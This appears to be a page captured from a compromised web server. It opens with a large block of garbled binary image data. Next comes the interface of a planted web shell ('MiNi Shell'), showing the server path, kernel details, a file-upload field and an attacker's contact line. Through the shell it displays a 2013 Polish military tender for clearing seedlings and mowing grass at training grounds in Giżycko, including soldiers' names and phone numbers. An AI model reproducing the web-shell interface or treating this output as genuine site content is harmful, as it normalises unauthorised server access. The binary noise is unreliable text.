JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130520/194806-N-2013.html

<p class="kh_header"><b>Giżycko: post. nr 48/2013 USŁUGA - WYCINKI SAMOSIEWÓW ORAZ KOSZENIE TRAWY NA OBIEKTACH SZKOLENIOWYCH NA TERENIE JW. 2098 I JW. 3797</b><br>
<b>Numer ogłoszenia: 194806 - 2013; data zamieszczenia: 20.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> post. nr 48/2013 USŁUGA - WYCINKI SAMOSIEWÓW ORAZ KOSZENIE TRAWY NA OBIEKTACH SZKOLENIOWYCH NA TERENIE JW. 2098 I JW. 3797.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa wycinki samosiewów oraz koszenie trawy na obiektach szkoleniowych na terenie JW. 2098 i JW. 3797.
Zadanie 1 - wycinka samosiewów
Zakres usługi.
Wycinka do 60% samosiewów wraz ze zrębkowaniem urobku i jego rozplantowanie w miejscu wykonania pracy warstwą nie grubszą niż 5 cm i wycinanka połączona z rozdrabnianiem i wyrównywaniem na koszt wykonawcy z powierzchni około 32,5 ha - dotyczy drzew i krzewów .
Wykonawca ma obowiązek przestrzegania przepisów ustawy z dnia 
16.04. 2004 r. o Ochronie Przyrody (Dz. U. z 2009 r. nr 151 poz. 1220
 z p. zm.) a zwłaszcza art. 83 ust.6 pkt. 4 niniejszej ustawy - tj. wycinki drzew których wiek nie przekracza 10 lat.
Wykonawca jest obowiązany do przekazania wartościowych drzew do nadleśnictwa.
Wykonawca ponosi koszty zrębkowania urobku po wycince drzew i rozplantowanie w miejscu wykonywania usługi.
Wykonawca jest odpowiedzialny za jakość wykonania usługi, zgodnie z niniejszym opisem oraz jest zobowiązany do zachowania porządku na placu robót oraz jego właściwego oznakowania i zabezpieczenia. Wymagania dotyczące wykonania usługi.
Wycinkę należy wykonać zgodnie z wydanymi w tym zakresie decyzjami            administracyjnymi, które mogą ograniczać wycinkę, co do terminu jej wykonania np. poza okresem lęgowym ptaków.
Podczas realizacji wycinki samosiewów Wykonawca zobowiązany jest przestrzegać zasady -  wysokość pnia nie powinna przekraczać ? średnicy w miejscu ciecia, a powierzchnia pnia powinna być zbliżona do poziomej ,
Wycięte samosiewy, poddać rozdrobnieniu poprzez zrębkowanie i rozplanowanie w miejscu wykonania pracy warstwą nie grupszą niż 5 cm na koszt Wykonawcy
Kontrola jakości wykonania usługi.
     Kontrola wykonania usługi polega na sprawdzeniu terenu po wykonaniu prac pod względem zgodności wykonanych prac z zaleceniami Zamawiającego co do powierzchni, warstwy rozplantowanego urobku.
Podstawa rozliczenia usługi.
	Rozliczenie usługi będzie dokonane jednorazowo po wykonaniu pełnego zakresu usługi i po końcowym odbiorze przez komisję złożoną z przedstawicieli Zamawiającego, Wykonawcy i Użytkownika. W/w komisja sporządza Protokół odbioru usługi, który zatwierdza Dowódca Jednostki Wojskowej Nr 4352. Na podstawie zatwierdzonego protokołu Wykonawca wystawi fakturę za wykonaną usługę. 
Uwaga.
Wykonawca przy realizacji usługi musi zwrócić szczególną ostrożność na niebezpieczeństwo związane z niewybuchami, niewypałami, przedmiotami niebezpiecznymi oraz żmijami zygzakowatymi występującymi na terenie objętym przedmiotem zamówienia.

Zadanie 2 - koszenie trawy
Zakres usługi:
Dwukrotne koszenie trawy na obiekcie strzelnicy garnizonowej - powierzchnia płaska 5,5 ha, powierzchnia na wałach (skosy) - 2 ha. Dwukrotne koszenie trawy na terenie Ośrodka szkolenia - powierzchnia płaska - 3, 0 ha, skarpy (skosy) - 1,5 ha. 
Dwukrotne koszenie trawy na obiekcie PCO - powierzchnia płaska 1 ha, skosy (skarpa)  - 0,5 ha.
Teren musi być oczyszczony z traw.
Wykonawca zobowiązany jest do zachowania porządku na placu robót oraz jego właściwego oznakowania i zabezpieczenia. 
Wymagania dotyczące wykonania usługi.
Terminy koszenia trawy należy ustalać z Użytkownikiem obiektu tj:.
strzelnica garnizonowa  - sierż. Tomaszem Matusiewicz tel. 727013459;
ośrodek szkolenia - sierż. Tomaszem Matusiewicz tel. 727013459:
PCO - sierż. Arkadiusz SAWICKI tel. 727040268
Koszenie na obiekcie strzelnicy garnizonowej będzie realizowane jedynie w piątki i soboty, w wyjątkowych sytuacjach po uzgodnieniu z użytkownikiem obiektu  koszenie może być wykonane również w inne dni tygodnia. 
Kontrola jakości wykonanej usługi.
Kontrola wykonania usługi polega na sprawdzeniu terenu po wykonaniu prac pod względem zgodności wykonanych prac z zaleceniami Zamawiającego.
Podstawa rozliczenia usługi.
Rozliczenie koszenia będzie dokonane po wykonaniu każdego jednego pełnego koszenia na wszystkich obiektach szkoleniowych (strzelnica garnizonowa, ośrodek szkoleniowy i obiekt PCO), po i ich końcowym odbiorze przez komisję złożoną z przedstawicieli Zamawiającego, Wykonawcy oraz Użytkownika. Ww. komisja sporządza Protokół odbioru usługi, który zatwierdza Dowódca Jednostki Wojskowej Nr 4352. Na podstawie zatwierdzonego protokołu Wykonawca wystawi fakturę za wykonaną usługę.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonywanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego (zał.  nr 1 do SIWZ).
2.Zestawienie cenowe zamówienia -  wypełniony i podpisany wg wzoru Zamawiającego (zał.  nr 6 do SIWZ).
3. WZÓR UMOWY - parafowany (zał. nr 5 do SIWZ ).
4. Pełnomocnictwo.
W przypadku podpisania oferty lub załączonego do niej jakiegokolwiek dokumentu i oświadczenia przez osobę nieuprawnioną  do reprezentacji wprost z postanowień KRS lub CEIDG (Centralna Ewidencja i Informacja o Działalności Gospodarczej) należy dołączyć pełnomocnictwo, sporządzone zgodnie z wymaganiami Kodeksu Cywilnego - oryginał lub notarialnie potwierdzoną kopię dokumentu. 

- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu
(zgodnie z art. 23 ustawy pzp)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.1.	Zamawiający dopuszcza  zmianę terminu zakończenia usługi w przypadku:
3.1.1.	klęsk żywiołowych uniemożliwiających realizację przedmioty zamówienia,
3.1.2.	wstrzymanie wykonania usługi przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy, 
3.2.	Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w  umowy w przypadku zmiany stawki podatku od towarów i usług  w 2013r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mon.gov.pl ,http://www.24wog.wp.mil.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU,
Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO
budynek nr 5 pok 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2013 godzina 09:00, miejsce: JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU,
Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO
budynek nr 5 pok 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - wycinka samosiewów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres usługi.
1.1	Wycinka do 60% samosiewów wraz ze zrębkowaniem urobku i jego rozplantowanie w miejscu wykonania pracy warstwą nie grubszą niż 5 cm i wycinanka połączona z rozdrabnianiem i wyrównywaniem na koszt wykonawcy z powierzchni około 32,5 ha - dotyczy drzew i krzewów .
1.2	Wykonawca ma obowiązek przestrzegania przepisów ustawy z dnia 
16.04. 2004 r. o Ochronie Przyrody (Dz. U. z 2009 r. nr 151 poz. 1220
 z p. zm.) a zwłaszcza art. 83 ust.6 pkt. 4 niniejszej ustawy - tj. wycinki drzew których wiek nie przekracza 10 lat.
1.3	Wykonawca jest obowiązany do przekazania wartościowych drzew do nadleśnictwa.
1.4	Wykonawca ponosi koszty zrębkowania urobku po wycince drzew i rozplantowanie w miejscu wykonywania usługi.
1.5	Wykonawca jest odpowiedzialny za jakość wykonania usługi, zgodnie z niniejszym opisem oraz jest zobowiązany do zachowania porządku na placu robót oraz jego właściwego oznakowania i zabezpieczenia. 
2.	Wymagania dotyczące wykonania usługi.
2.1.	Wycinkę należy wykonać zgodnie z wydanymi w tym zakresie decyzjami            administracyjnymi, które mogą ograniczać wycinkę, co do terminu jej wykonania np. poza okresem lęgowym ptaków.
2.2.	Podczas realizacji wycinki samosiewów Wykonawca zobowiązany jest przestrzegać zasady -  wysokość pnia nie powinna przekraczać ? średnicy w miejscu ciecia, a powierzchnia pnia powinna być zbliżona do poziomej ,
2.3.	Wycięte samosiewy, poddać rozdrobnieniu poprzez zrębkowanie i rozplanowanie w miejscu wykonania pracy warstwą nie grupszą niż 5 cm na koszt Wykonawcy
3.	Kontrola jakości wykonania usługi.
        Kontrola wykonania usługi polega na sprawdzeniu terenu po wykonaniu prac pod względem zgodności wykonanych prac z zaleceniami Zamawiającego co do powierzchni, warstwy rozplantowanego urobku.
4.	Podstawa rozliczenia usługi.
	Rozliczenie usługi będzie dokonane jednorazowo po wykonaniu pełnego zakresu usługi i po końcowym odbiorze przez komisję złożoną z przedstawicieli Zamawiającego, Wykonawcy i Użytkownika. Ww komisja sporządza Protokół odbioru usługi, który zatwierdza Dowódca Jednostki Wojskowej Nr 4352. Na podstawie zatwierdzonego protokołu Wykonawca wystawi fakturę za wykonaną usługę. 
5.	Uwaga.
Wykonawca przy realizacji usługi musi zwrócić szczególną ostrożność na niebezpieczeństwo związane z niewybuchami, niewypałami, przedmiotami niebezpiecznymi oraz żmijami zygzakowatymi występującymi na terenie objętym przedmiotem zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - koszenie trawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres usługi:
1.1.	Dwukrotne koszenie trawy na obiekcie strzelnicy garnizonowej - powierzchnia płaska 5,5 ha, powierzchnia na wałach (skosy) - 2 ha. 
1.2	Dwukrotne koszenie trawy na terenie Ośrodka szkolenia - powierzchnia płaska - 3, 0 ha, skarpy (skosy) - 1,5 ha. 
1.3	Dwukrotne koszenie trawy na obiekcie PCO - powierzchnia płaska 1 ha, skosy (skarpa)  - 0,5 ha.
1.4	Teren musi być oczyszczony z traw.
1.5	Wykonawca zobowiązany jest do zachowania porządku na placu robót oraz jego właściwego oznakowania i zabezpieczenia. 
2.	Wymagania dotyczące wykonania usługi.
2.1.	Terminy koszenia trawy należy ustalać z Użytkownikiem obiektu tj:.
strzelnica garnizonowa  - sierż. Tomaszem Matusiewicz tel. 727013459;
ośrodek szkolenia - sierż. Tomaszem Matusiewicz tel. 727013459:
PCO - sierż. Arkadiusz SAWICKI tel. 727040268
2.2.	Koszenie na obiekcie strzelnicy garnizonowej będzie realizowane jedynie w piątki i soboty, w wyjątkowych sytuacjach po uzgodnieniu z użytkownikiem obiektu  koszenie może być wykonane również w inne dni tygodnia. 
3.	Kontrola jakości wykonanej usługi.
        Kontrola wykonania usługi polega na sprawdzeniu terenu po wykonaniu prac pod względem zgodności wykonanych prac z zaleceniami Zamawiającego.
4.	Podstawa rozliczenia usługi.
	Rozliczenie koszenia będzie dokonane po wykonaniu każdego jednego pełnego koszenia na wszystkich obiektach szkoleniowych (strzelnica garnizonowa, ośrodek szkoleniowy i obiekt PCO), po i ich końcowym odbiorze przez komisję złożoną z przedstawicieli Zamawiającego, Wykonawcy oraz Użytkownika. Ww komisja sporządza Protokół odbioru usługi, który zatwierdza Dowódca Jednostki Wojskowej Nr 4352..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com